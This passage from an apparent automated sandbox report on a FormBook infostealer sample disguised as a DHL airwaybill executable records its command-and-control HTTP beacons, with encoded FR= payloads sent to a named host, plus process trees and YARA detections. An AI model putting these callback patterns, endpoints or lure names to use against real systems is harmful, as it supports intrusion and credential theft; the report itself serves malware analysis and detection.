              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.moveon.cat
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.moveon.cat
              Referer: http://www.moveon.cat/bb55/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 6e 66 62 30 47 4f 4f 55 4a 51 44 38 64 4c 47 58 76 69 59 56 31 32 68 51 30 46 54 77 42 6a 4f 38 78 70 4b 74 54 65 4c 61 2b 44 53 34 58 31 6d 58 64 35 71 45 4b 51 72 6a 7a 6e 4c 33 74 2f 4f 39 6c 2b 65 74 42 44 4b 2b 79 31 2f 75 56 36 4e 64 50 67 4f 7a 53 37 65 75 48 71 4f 64 42 36 61 6d 6d 45 35 6d 76 6f 70 4b 37 6f 62 51 39 67 2b 4c 6e 6f 51 47 76 38 6e 6b 45 58 7a 46 71 45 79 39 66 77 76 6a 2f 6e 74 49 2f 5a 71 39 68 73 4c 69 58 35 33 7a 76 72 4a 68 4b 6b 35 35 2f 57 52 31 77 54 44 2f 6a 36 67 5a 67 31 70 74 72 30 46 47 33 6f 39 6e 34 66 5a 64 79 44 41 62 6c 36 6d 5a 33 66 73 30 6f 72 2f 4f 79 34 6f 6f 53 4d 39 6c 72 4f 6d 49 74 76 69 55 48 54 76 36 4e 4a 52 66 33 67 3d 3d
              Data Ascii: FR=nfb0GOOUJQD8dLGXviYV12hQ0FTwBjO8xpKtTeLa+DS4X1mXd5qEKQrjznL3t/O9l+etBDK+y1/uV6NdPgOzS7euHqOdB6ammE5mvopK7obQ9g+LnoQGv8nkEXzFqEy9fwvj/ntI/Zq9hsLiX53zvrJhKk55/WR1wTD/j6gZg1ptr0FG3o9n4fZdyDAbl6mZ3fs0or/Oy4ooSM9lrOmItviUHTv6NJRf3g==
              Sep 6, 2024 09:08:23.701781034 CEST1236INHTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:23 GMT
              Server: Apache
              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"
              Content-Encoding: gzip
              Data Raw: 32 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 96 db 36 92 ef df f6 39 fb 0e 34 9d b5 a5 89 48 89 d4 57 4b dd 72 d6 e3 38 6b ef 49 62 6f ec cc 9e 89 95 db 87 92 20 35 6d 8a d4 90 54 7f a4 d3 0f 73 9f e5 be d8 fd 55 01 e0 87 44 a9 d5 dd 9e 73 76 3a 71 37 09 16 aa 0a 85 42 a1 00 14 80 93 27 df bf 7b f5 f1 ef ef 5f 1b 67 e9 32 78 f1 6f 8f 4f e8 af 11 78 e1 62 64 8a c4 34 66 5e ea 59 89 58 ae 02 7f 2a 46 66 cf 76 ed ae 09 b8 47 27 67 c2 9b d1 c3 a3 93 a5 48 3d 63 7a e6 c5 89 48 47 e6 af 1f 7f b0 8e 4c a3 59 f8 16 7a 4b e4 3d f7 c5 c5 2a 8a 53 d3 98 46 61 2a 42 c0 5e f8 b3 f4 6c 34 13 e7 40 6e f1 4b c3 f0 43 3f f5 bd c0 4a a6 5e 20 46 0e 13 7b 74 92 fa 69 20 5e bc ff 7f ff 77 e1 87 9e 11 46 86 08 09 4b ec cd 3c e3 d9 d3 23 d7 71 8e 8d 9f a2 73 61 bc 0b 4f 9a 12 f8 b1 64 8c 89 3f 8f a3 49 94 26 cf 33 d2 cf c3 c8 0f 67 e2 b2 01 5c f3 28 08 a2 8b e7 60 f9 f1 49 32 8d fd 55 6a a4 57 2b 70 9c 8a cb b4 f9 d9 3b f7 64 aa f9 e2 71 f3 2f c6 c9 93 4f af be 7f f9 f1 e5 27 e3 2f cd c7 17 40 12 5d d8 a7 17 [TRUNCATED]
              Data Ascii: 2756}694HWKr8kIbo 5mTsUDsv:q7B'{_g2xoOxbd4f^YX*FfvG'gH=czHGLYzK=*SFa*B^l4@nKC?J^ F{ti ^wFK<#qsaOd?I&3g\(`I2UjW+p;dq/O'/@]+>D"1F9kC,MWp7/Hiq3Nnq^ql`UKr>ddlZ"!Tkz)evh4n^,?Xe~hN;gl90[ApFB|2_^lD!u1u_ttWIE&CH%jX=s/XwZ8I(m[5$Qg7(dW5 =EQ_4aK^8KRQ1.av_wU<Jw65z#!y~tFj(UMWVh4?s)4!zv|5Vk=/S;&%wO2"*Z@x g( &~O{){v(<"yF
              Sep 6, 2024 09:08:23.701802969 CEST1236INData Raw: c8 17 90 6f a4 80 c4 46 0a 08 6d a4 80 dc 46 0a 88 96 53 40 ba 7e cc 55 a0 6c 82 ac 83 42 49 21 f1 d9 d4 ed 71 46 92 fe c4 99 68 6e 8b 9f 48 e2 f4 a9 7e a3 30 38 79 ad cf 75 ad 53 a3 88 47 e6 1a 06 79 ee 87 62 66 3e 19 91 01 8e e6 c6 ff 44 f1 17
              Data Ascii: oFmFS@~UlBI!qFhnH~08yuSGybf>DgM4ZgIJH0BVCF2@,Lz_Qk3q}zb5MjMp`E2=G~tvWdF!_{P}OQZr
              Sep 6, 2024 09:08:23.701814890 CEST448INData Raw: 16 0a 52 c5 4a 51 1b 58 a2 5c fb 0b 76 61 0f 12 f1 30 8e a2 f4 da b2 20 46 6b 15 0b 8c 56 2d cb 4b 56 70 44 20 18 94 d8 b2 92 7f ac bd 58 a0 15 1c ef 83 ea 58 ed a1 d1 69 b6 f7 02 b5 ad ce d0 68 37 3b b7 00 b9 04 e4 ee 05 72 89 9c 7b 0b 39 a7 67
              Data Ascii: RJQX\va0 FkV-KVpD XXih7;r{9gw9k`91h:0BKO[S3BZ`po29nC8ST,X2\hsi+\QDBZ%vYh22h"?M'j8M)E?
              Sep 6, 2024 09:08:23.701828957 CEST1236INData Raw: e0 f4 06 10 48 a7 e1 0c ba b7 91 9f 46 51 40 34 2f bc 78 69 b1 bd 8e d7 cb a1 b1 87 60 bf 03 7a f8 e7 e6 95 ee 74 9d 86 03 45 70 5b 83 ba e1 16 25 40 15 03 11 74 74 1a 98 ed 80 2f 52 8f 9e 4e a3 cc a8 a8 c1 51 dd 38 ca d2 40 a0 73 d4 e8 df 2a 3e
              Data Ascii: HFQ@4/xi`ztEp[%@tt/RNQ8@s*>JJamP`VR.wr.b9=AXn&=i5zm5:%2QpH{PypMtn="EhT=#1E?{J/ISo4qQ]j
              Sep 6, 2024 09:08:23.701839924 CEST1236INData Raw: b7 47 82 1d c0 e1 3c 66 ba b3 af c1 6a 13 4b 8f 22 4d 38 a0 4d e3 dd 08 60 7b 20 db 1c ea 06 53 43 31 92 b7 4a 54 6f 67 c2 6e a6 66 31 63 e9 85 e2 1b 45 6c 05 62 e1 4d af 4a cc 76 b0 17 ce e9 df 2e 64 19 83 b9 63 4b 99 41 51 fb bc 41 6c 77 fc 1f
              Data Ascii: G<fjK"M8M`{ SC1JTognf1cElbMJv.dcKAQAlwShhE!f ;|Q>,XK.VK{vgMujc\|1iY-I"4__Jh0^M;#"%G^bn
              Sep 6, 2024 09:08:23.701870918 CEST1236INData Raw: 9b fd 5c 32 63 16 1f fc 72 6d 64 3d 16 22 4f 5d ee 96 0f cf 8d ad d1 ec 6c e0 60 16 da 1e 96 ed bf 81 2b ae 77 68 c1 bf 68 b7 19 2d 57 fc a6 d7 64 dc 81 18 06 86 62 11 c5 57 f0 c5 35 3d d5 e3 97 e8 dd 83 18 36 fc 88 08 68 23 8a 08 4e 31 ea c1 79
              Data Ascii: \2crmd="O]l`+whh-WdbW5=6h#N1y4Sx0J5d@+qM&jq=ys3XK%renu}37jxe:cTLcg\C{plcYZMme.:Q9]y;?
              Sep 6, 2024 09:08:23.701881886 CEST672INData Raw: 84 4d f6 71 4c 01 f4 a5 8c 61 b8 64 21 74 8b 2e 88 5e 81 70 0d e4 c9 d9 53 b1 6c ab e4 62 05 07 c2 9b f0 81 d4 23 d3 42 b7 14 47 14 b0 82 63 bb e0 86 98 86 87 33 44 ad 33 58 0f 11 e2 98 d1 78 2d 6d c8 26 0e 9c 59 b5 80 4d d5 de c6 f6 67 44 2e e0
              Data Ascii: MqLad!t.^pSlb#BGc3D3Xx-m&YMgD.B-md5jjDE9=HuIm$oKIa'w. 4>z>Qr9*TTZAcu@+z3jiD"s(e8'go6Gw-qd(Vad6qp6BW@gfRQg
              Sep 6, 2024 09:08:23.701893091 CEST1236INData Raw: 1a bf 79 44 38 ef a0 f7 df f9 b0 27 3a 56 79 45 5b 11 d9 3a c2 10 71 bb dc a0 67 36 6a 1e b7 4a 24 c5 68 59 79 93 06 8b 26 53 26 09 8d 9b 2f 18 7a 33 6c 56 26 df 3d 8e f8 00 36 75 5c c0 a1 8c 6a f8 fb b1 4a 3e 68 31 de 1a 73 1d 1c b2 6c c9 85 98
              Data Ascii: yD8':VyE[:qg6jJ$hYy&S&/z3lV&=6u\jJ>h1slk6L^i|]P[*pKnl,Rca^:x4^xyS3NNbLD:0lxph4O<>m;D0fxB{Sy"K
              Sep 6, 2024 09:08:23.701903105 CEST1236INData Raw: c4 98 23 a5 c5 1c b6 81 7f 93 2f 50 46 4d ef 42 04 cc 1c 1a ec 86 ac af 30 2f 26 89 fd 5d 3d c9 6b c7 aa 2e 41 f8 0a db e0 8a 8e 6b 69 a3 a0 85 26 a9 ba c6 a2 9f 2f 77 09 ca 8d 58 c5 bc da e9 a5 51 be f4 ec e9 96 86 7f 2a 83 15 7b f6 d4 c6 b5 2d
              Data Ascii: #/PFMB0/&]=k.Aki&/wXQ*{-|ma:boG[9-]t(Bvoy@9S@gAg0 Q+^o|8CbGyl9y_owg=#1eCl$o \Okc0EG&I"j#9q
              Sep 6, 2024 09:08:23.701913118 CEST682INData Raw: ba 2c b6 11 fd f8 39 3a c5 42 ef 2e 83 da 20 2e be dd 98 37 78 99 c3 90 6e 4b 6c 98 18 d1 04 38 4d 83 be 50 1f 8b 8c a5 c5 98 31 ad c6 a0 84 5c 00 b5 1e 83 d7 83 7b 2a 06 54 cb 32 3b 3a 36 5a 9a 19 cb b5 19 c2 0c 09 62 dd 05 4f 57 fa 49 2a 3b ef
              Data Ascii: ,9:B. .7xnKl8MP1\{*T2;:6ZbOWI*;@z|z#wVb\^(bo.:FD':=0Xt;gmQ-Pq_Z?f |qz*jDUPw4'6j-'LUO;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.649780217.160.0.193805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:25.548528910 CEST1822OUTPOST /bb55/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.moveon.cat
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.moveon.cat
              Referer: http://www.moveon.cat/bb55/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 6e 66 62 30 47 4f 4f 55 4a 51 44 38 64 4c 47 58 76 69 59 56 31 32 68 51 30 46 54 77 42 6a 4f 38 78 70 4b 74 54 65 4c 61 2b 41 79 34 58 43 6d 58 4d 6f 71 45 4c 51 72 6a 76 33 4c 71 74 2f 4f 67 6c 2b 33 6b 42 44 57 75 79 33 33 75 55 66 52 64 62 42 4f 7a 4c 72 65 75 66 61 4f 59 66 4b 62 69 6d 45 70 69 76 73 31 4b 37 6f 62 51 39 68 75 4c 68 35 51 47 74 38 6e 6a 4e 33 7a 7a 75 45 79 46 66 32 48 7a 2f 6e 68 2b 38 70 4b 39 68 4d 37 69 48 61 66 7a 31 72 4a 6a 4e 6b 34 2b 2f 57 74 51 77 54 65 47 6a 36 6b 7a 67 31 4e 74 6f 56 73 66 76 34 41 2f 74 64 56 41 6d 69 63 37 2b 39 2f 72 2f 4e 30 59 6b 4b 32 6d 36 37 6b 5a 4d 70 6c 73 72 39 66 30 37 74 71 50 4a 31 36 6f 4f 72 45 6d 6e 2b 4e 50 46 31 55 58 36 2b 66 4b 64 4d 39 79 69 75 52 79 30 35 63 6c 69 37 39 56 38 45 39 32 66 78 6b 6e 33 6d 57 4a 6c 6f 37 66 6c 35 66 58 32 55 71 62 69 58 54 38 34 44 7a 66 52 35 56 6c 59 6a 4e 78 64 41 67 37 6b 57 39 58 39 6d 35 4e 4f 55 6d 5a 74 32 43 4a 7a 4c 36 66 61 64 33 72 57 33 43 45 68 2b 6a 54 6e 30 73 30 65 6b 56 [TRUNCATED]
              Data Ascii: FR=nfb0GOOUJQD8dLGXviYV12hQ0FTwBjO8xpKtTeLa+Ay4XCmXMoqELQrjv3Lqt/Ogl+3kBDWuy33uUfRdbBOzLreufaOYfKbimEpivs1K7obQ9huLh5QGt8njN3zzuEyFf2Hz/nh+8pK9hM7iHafz1rJjNk4+/WtQwTeGj6kzg1NtoVsfv4A/tdVAmic7+9/r/N0YkK2m67kZMplsr9f07tqPJ16oOrEmn+NPF1UX6+fKdM9yiuRy05cli79V8E92fxkn3mWJlo7fl5fX2UqbiXT84DzfR5VlYjNxdAg7kW9X9m5NOUmZt2CJzL6fad3rW3CEh+jTn0s0ekVe8y/uUiJxM51bcJMH0RCMLlVbY/fP3DnNyjvPjKJKppfGtbJWX1NH8FoU68uPdIUKFiedtHlrt5A/9cORNT1INlkSBJNhs7DHZsmHQw+XeAoPRVecED1uSQg2LDl1v27BDWqhm0c5wkPsNvKdZin7ogonHO23tXb+2OrTq8xbLbg1axx9EiNri1q+2SYbU8AUwr68tsszVDh49gw1Zy5Y2IQpaWhlBoosv1qo6EzcZoD/rAyBBjNjVSJD0B19GBPsaPxmW1RmI5YhXGaeWYUKVVSvMkUMMFgbt1WsST8g1AB02VvPhxndt6mBF4CpzzqhUL2Oi/CsVI6l6eVXfy59oOjZ0cv8147V4DMHuggfjm083eorq5AdDNV96t7l2Fq5NzisuTlF+MBDxuvdsFN7aUIZOOrbn3c+pKjQ9Ow1l+cxO40RdRmBCKnslpsWEJ4VyGblfDJq2Glz7OEZZ7W1XmYU4IhX+FK/1u3L3gAGyjulJKfPJAp7QiaslSNeKbTMAX8vZZ4X5O8GZjLKjqBUIVIpdT9gKSOck65oSNpM2+ZDKjLKaeBIqtVSal2CkgAQey+wIoB/XrSxkUXQlPCk8eQn2V3X12dEpjN4MNEdFc3ElWY0FS8E4CFRsPXPyH4CcmgSwO4C/FBw8J6d1TKsiVnkDHMTj2duF [TRUNCATED]
              Sep 6, 2024 09:08:26.330564022 CEST1236INHTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:26 GMT
              Server: Apache
              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <http://moveon.cat/wp-json/>; rel="https://api.w.org/"
              Content-Encoding: gzip
              Data Raw: 32 37 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 96 db 36 92 ef df f6 39 fb 0e 34 9d b5 a5 89 48 89 d4 57 4b dd 72 d6 e3 38 6b ef 49 62 6f ec cc 9e 89 95 db 87 92 20 35 6d 8a d4 90 54 7f a4 d3 0f 73 9f e5 be d8 fd 55 01 e0 87 44 a9 d5 dd 9e 73 76 3a 71 37 09 16 aa 0a 85 42 a1 00 14 80 93 27 df bf 7b f5 f1 ef ef 5f 1b 67 e9 32 78 f1 6f 8f 4f e8 af 11 78 e1 62 64 8a c4 34 66 5e ea 59 89 58 ae 02 7f 2a 46 66 cf 76 ed ae 09 b8 47 27 67 c2 9b d1 c3 a3 93 a5 48 3d 63 7a e6 c5 89 48 47 e6 af 1f 7f b0 8e 4c a3 59 f8 16 7a 4b e4 3d f7 c5 c5 2a 8a 53 d3 98 46 61 2a 42 c0 5e f8 b3 f4 6c 34 13 e7 40 6e f1 4b c3 f0 43 3f f5 bd c0 4a a6 5e 20 46 0e 13 7b 74 92 fa 69 20 5e bc ff 7f ff 77 e1 87 9e 11 46 86 08 09 4b ec cd 3c e3 d9 d3 23 d7 71 8e 8d 9f a2 73 61 bc 0b 4f 9a 12 f8 b1 64 8c 89 3f 8f a3 49 94 26 cf 33 d2 cf c3 c8 0f 67 e2 b2 01 5c f3 28 08 a2 8b e7 60 f9 f1 49 32 8d fd 55 6a a4 57 2b 70 9c 8a cb b4 f9 d9 3b f7 64 aa f9 e2 71 f3 2f c6 c9 93 4f af be 7f f9 f1 e5 27 e3 2f cd c7 17 40 12 5d d8 a7 17 [TRUNCATED]
              Data Ascii: 2756}694HWKr8kIbo 5mTsUDsv:q7B'{_g2xoOxbd4f^YX*FfvG'gH=czHGLYzK=*SFa*B^l4@nKC?J^ F{ti ^wFK<#qsaOd?I&3g\(`I2UjW+p;dq/O'/@]+>D"1F9kC,MWp7/Hiq3Nnq^ql`UKr>ddlZ"!Tkz)evh4n^,?Xe~hN;gl90[ApFB|2_^lD!u1u_ttWIE&CH%jX=s/XwZ8I(m[5$Qg7(dW5 =EQ_4aK^8KRQ1.av_wU<Jw65z#!y~tFj(UMWVh4?s)4!zv|5Vk=/S;&%wO2"*Z@x g( &~O{){v(<"yF
              Sep 6, 2024 09:08:26.330594063 CEST1236INData Raw: c8 17 90 6f a4 80 c4 46 0a 08 6d a4 80 dc 46 0a 88 96 53 40 ba 7e cc 55 a0 6c 82 ac 83 42 49 21 f1 d9 d4 ed 71 46 92 fe c4 99 68 6e 8b 9f 48 e2 f4 a9 7e a3 30 38 79 ad cf 75 ad 53 a3 88 47 e6 1a 06 79 ee 87 62 66 3e 19 91 01 8e e6 c6 ff 44 f1 17
              Data Ascii: oFmFS@~UlBI!qFhnH~08yuSGybf>DgM4ZgIJH0BVCF2@,Lz_Qk3q}zb5MjMp`E2=G~tvWdF!_{P}OQZr
              Sep 6, 2024 09:08:26.330606937 CEST1236INData Raw: 16 0a 52 c5 4a 51 1b 58 a2 5c fb 0b 76 61 0f 12 f1 30 8e a2 f4 da b2 20 46 6b 15 0b 8c 56 2d cb 4b 56 70 44 20 18 94 d8 b2 92 7f ac bd 58 a0 15 1c ef 83 ea 58 ed a1 d1 69 b6 f7 02 b5 ad ce d0 68 37 3b b7 00 b9 04 e4 ee 05 72 89 9c 7b 0b 39 a7 67
              Data Ascii: RJQX\va0 FkV-KVpD XXih7;r{9gw9k`91h:0BKO[S3BZ`po29nC8ST,X2\hsi+\QDBZ%vYh22h"?M'j8M)E?
              Sep 6, 2024 09:08:26.330622911 CEST1236INData Raw: 3c 84 c8 ed 56 e3 21 d8 0f b3 25 0f a1 20 ab 1a 16 a9 42 3a 95 56 e2 41 f5 5e 89 f1 76 ca d2 ee 3c a4 98 1b 84 0f b6 46 0f a2 79 0f 1b f5 10 7a b2 2a ef 62 b9 1e 42 ed ce f6 ec 21 c4 ee 68 e5 1e 4e ea 36 db c7 2b 41 da ee 15 5e f6 98 a3 83 bd 1f
              Data Ascii: <V!% B:VA^v<Fyz*bB!hN6+A^h "?aAeH`[p{{P{i68OUY,mUzB9;y]Y:d.<P^XxSrA|Tb
              Sep 6, 2024 09:08:26.330636978 CEST1236INData Raw: d6 49 95 14 c5 72 c3 91 41 c7 8c 30 97 b8 16 a3 94 72 a6 0a 3b 11 db 21 6d d1 c6 b6 39 45 22 f3 4b ef 92 95 90 70 1f 46 0f e0 77 ee 5f ca d6 57 51 92 9c 60 29 17 b7 a1 0d c1 ee 6c 21 db 4a 25 a5 bf b3 52 1f 05 d8 64 0f 8f 4c c5 5e 15 da c8 01 82
              Data Ascii: IrA0r;!m9E"KpFw_WQ`)l!J%RdL^))N.>kcE`yPxS_%Cm)M3W"sOIe)HBSYf2i5[Ps1by*#rTik,,`xjq[K|\GRs:wUK`%= 9,F
              Sep 6, 2024 09:08:26.330651045 CEST1236INData Raw: 1c e4 50 22 43 75 a3 e4 42 c7 98 cd bc 78 66 28 52 5c 7a aa d6 8c 4f 10 5e 07 1a 9c 8a 8c 84 c0 67 c5 93 fd 1e 76 2e 59 5d 9c b8 a9 30 66 89 50 6c f2 e4 e8 33 0b 49 ae df 14 52 e5 11 54 d6 56 3a 90 51 61 e5 22 d6 d3 95 1f 44 54 7a ea 5a 5f e0 a4
              Data Ascii: P"CuBxf(R\zO^gv.Y]0fPl3IRTV:Qa"DTzZ_--==Q,d'&c"cP]/l3^IW&.1IO}Zfcz|Ep>\<5:YB{ft>JfDT6NU|g,@YZIVM*HReC2'f
              Sep 6, 2024 09:08:26.330739021 CEST1236INData Raw: 82 e0 6c 1c 2c 1b 52 a7 63 d1 61 9e 00 fa 5e e0 3a 91 78 01 34 5e 8c 78 f9 f3 08 79 18 90 0f 92 87 53 84 f3 85 93 33 00 be 4e d2 f1 ba d5 12 4e 62 ac 13 4c cd 44 c6 3a a4 b9 19 84 7f cf 10 9c 82 30 6c 78 94 b0 70 68 a5 06 8e 34 4f ce a4 8b 1c 19
              Data Ascii: l,Rca^:x4^xyS3NNbLD:0lxph4O<>m;D0fxB{Sy"K6qAl`v{NpB;$ ZwrM%Q|8v0fD~Qq[Nc$wOTw$FP_K
              Sep 6, 2024 09:08:26.330749989 CEST1236INData Raw: 92 85 aa b8 74 ae 28 42 76 6f 79 40 8e 39 0d ec 53 40 0e c2 67 41 67 30 1e 10 e8 8e e0 16 20 11 83 51 d8 2b 5e 03 6f 98 ec a4 7c 38 43 b3 9d 62 f1 ff 47 79 17 03 e7 c4 6c ab da 39 0a 04 1c cf 79 1b 18 5f 6f 77 67 3d 23 31 65 43 be 6c 24 05 be 6f
              Data Ascii: t(Bvoy@9S@gAg0 Q+^o|8CbGyl9y_owg=#1eCl$o \Okc0EG&I"j#9qBm&}R)=ts9p@S$HpJef@:P|TT~'O,1M}Jz6&H+>
              Sep 6, 2024 09:08:26.330761909 CEST566INData Raw: 62 8d d2 5c b9 5e 03 05 e2 95 28 dd 93 a2 d6 16 99 62 6f 2e da 80 c3 1e 3a ce 0e dd bd 46 f7 44 e0 82 27 fc c5 9f be 8d b5 1b 3a 01 80 13 e9 ad 3d 30 58 09 74 3b 67 6d 90 98 51 dd d9 03 2d d5 90 0c 50 f7 b4 71 fa 5f b6 8a ca ae 89 96 fe f6 5a da
              Data Ascii: b\^(bo.:FD':=0Xt;gmQ-Pq_Z?f |qz*jDUPw4'6j-'LUO;Bk+]sRn]G#ey,~uA&(><1qwm s%E#MnEZ#9H|}l2owh3\pC,P&U


              Session IDSource IPSource PortDestination IPDestination Port
              52192.168.2.649782217.160.0.19380
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:08:29.383398056 CEST528OUTGET /bb55/?FR=qdzUF+C4KgbVJvWmmn8R5hRL/2fqEFiYhougQvjggmODZzWjY8rbJBXd+0mtuuLK6ozYWyaagBrSOvtROhupesjxef+9ZK6Rgj9rnagPgpTk5Eewhqg4wMCweUmjwTCKS2nymHQ=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.moveon.cat
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:30.163009882 CEST510INHTTP/1.1 301 Moved Permanently
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Date: Fri, 06 Sep 2024 07:08:29 GMT
              Server: Apache
              X-Powered-By: PHP/8.2.23
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              X-Redirect-By: WordPress
              Location: http://moveon.cat/bb55/?FR=qdzUF+C4KgbVJvWmmn8R5hRL/2fqEFiYhougQvjggmODZzWjY8rbJBXd+0mtuuLK6ozYWyaagBrSOvtROhupesjxef+9ZK6Rgj9rnagPgpTk5Eewhqg4wMCweUmjwTCKS2nymHQ=&yXghy=KTox
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:03:04:19
              Start date:06/09/2024
              Path:C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
              Imagebase:0x2c0000
              File size:776'704 bytes
              MD5 hash:7E3FEACBDE086188081C1FA2C0891090
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:3
              Start time:03:04:20
              Start date:06/09/2024
              Path:C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"
              Imagebase:0xfc0000
              File size:776'704 bytes
              MD5 hash:7E3FEACBDE086188081C1FA2C0891090
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2381046112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2381729244.0000000001A70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2382589279.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              General

              Target ID:5
              Start time:03:04:36
              Start date:06/09/2024
              Path:C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe"
              Imagebase:0xff0000
              File size:140'800 bytes
              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              General

              Target ID:6
              Start time:03:04:38
              Start date:06/09/2024
              Path:C:\Windows\SysWOW64\mshta.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\mshta.exe"
              Imagebase:0x5a0000
              File size:13'312 bytes
              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4605505683.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
